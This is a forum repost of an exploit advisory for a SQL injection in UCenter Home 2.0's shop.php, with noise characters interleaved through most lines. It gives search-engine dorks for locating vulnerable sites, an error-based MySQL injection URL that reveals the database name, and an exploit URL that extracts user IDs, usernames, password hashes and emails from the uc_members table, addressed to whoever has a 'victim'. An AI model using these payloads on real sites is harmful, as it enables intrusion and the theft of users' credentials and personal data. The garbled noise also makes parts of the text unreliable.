% }/ C7 `. F/ ?- ^
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__ 2 r8 j0 }# v+ |: K7 X
1 ?: u. Y" O6 j9 q4 }6 e2 A9 M0 t" O
8 o7 e j2 [; m9 `: ^# t) {6 U2 L" _ G
*/ Author : KnocKout
$ |" z* X4 k1 o+ ~- L) C
7 M- D4 }: `7 @; L0 x; G [2 ]*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
8 c# }% Z* t1 L8 @* _8 b9 k: b% \* t& `0 r! N/ d ~2 U' V4 C/ V
*/ Contact: knockoutr@msn.com
2 `. V; Z2 P8 s2 l: w) Z3 u0 {6 X
3 I5 ^, p2 y- A; k+ I) k*/ Cyber-Warrior.org/CWKnocKout * E, ]2 E1 R1 n2 N
/ W& v4 _" T* ]" c& N& q__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== ; E* E2 @% w* Y9 t" X l
0 f* I9 a$ A: c! g0 d6 T' d1 p
Script : UCenter Home ( g; L# y' v: q+ {
% X5 d0 r9 z/ S% t: M
Version : 2.0
' l7 x4 N( h# m4 V- i4 O+ s! N# r4 R }( I/ M5 [* }; G3 Y7 }
Script HomePage : http://u.discuz.net/ ( K6 s' [# r0 L1 }
% }$ Q" c5 u/ Q N8 a9 i5 u- l/ H__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
# B) ~6 V) ^6 l: D! o2 j3 W# Q% d* }& X. ?. M6 O) K
Dork : Powered by UCenter inurl:shop.php?ac=view 6 A% H! H. e7 V' i5 N! D
1 S* J" k- l8 W5 n6 ~, T$ Q1 s G
Dork 2 : inurl:shop.php?ac=view&shopid= 7 L# r8 }9 l8 i" S& }& @/ I- D6 ^
- A4 c- @0 {; {: u# ]) L9 |5 w' N
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== 0 U% L* h5 f! {( w% {: Z9 E+ w
4 K; B+ n' i* V. e; d* X
Vuln file : Shop.php " S* O* @! m" o9 u
4 E$ D: U ?& ]* avalue's : (?)ac=view&shopid= 5 _: D: v4 b6 K, f
" t7 g% m8 s2 k5 R; t HVulnerable Style : SQL Injection (MySQL Error Based) ! _$ `9 ]) H/ W& j" Z- Z
" M7 D; V( c: ` v4 [; M8 N
Need Metarials : Hex Conversion 8 E$ u; Q# e8 f$ e2 S2 K5 A0 |
5 D0 n' N7 i% S__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== 0 j4 t, ?6 B3 ?$ Y& }
, T9 q' E: P, u
Your Need victim Database name. 4 F/ A: N7 ?0 R1 J/ W8 N
9 y8 |- ]+ Q+ N' u# ]% f' R
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
, t5 `2 n) X: ?* w6 n& o
- T0 ~) R' S+ `+ { {.. 5 x# _& n2 J" Z5 U
W! m+ S8 z' k( t7 l1 pDB : Okey. # y2 h, z4 z7 F% Z/ f8 }. i
9 v8 J/ a9 z6 n& i+ _1 Y
your edit DB `[TARGET DB NAME]`
# O5 [0 j) Q5 s3 w: b4 V0 y8 K0 t
; w+ p6 A6 C# e0 z* xExample : 'hiwir1_ucenter' - Y$ p! V; ]: z2 m* l. @
6 B6 _& t7 P# m+ B& j0 \/ X3 f
Edit : Okey. 3 S4 Z# r% {- |0 Z
" ]5 x9 H: E( V1 e$ Z8 p7 |
Your use Hex conversion. And edit Your SQL Injection Exploit.. , u9 j e! F, ?$ o. v4 @
# C7 J# w0 _( @/ t+ N
% Z/ R! Q/ i7 v
3 ?) N, K1 U' U& y' \Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
4 x; c3 q+ Y/ _: W$ w9 ~: G* Y |
发表于 2013-2-27 21:31:31
收藏
支持
反对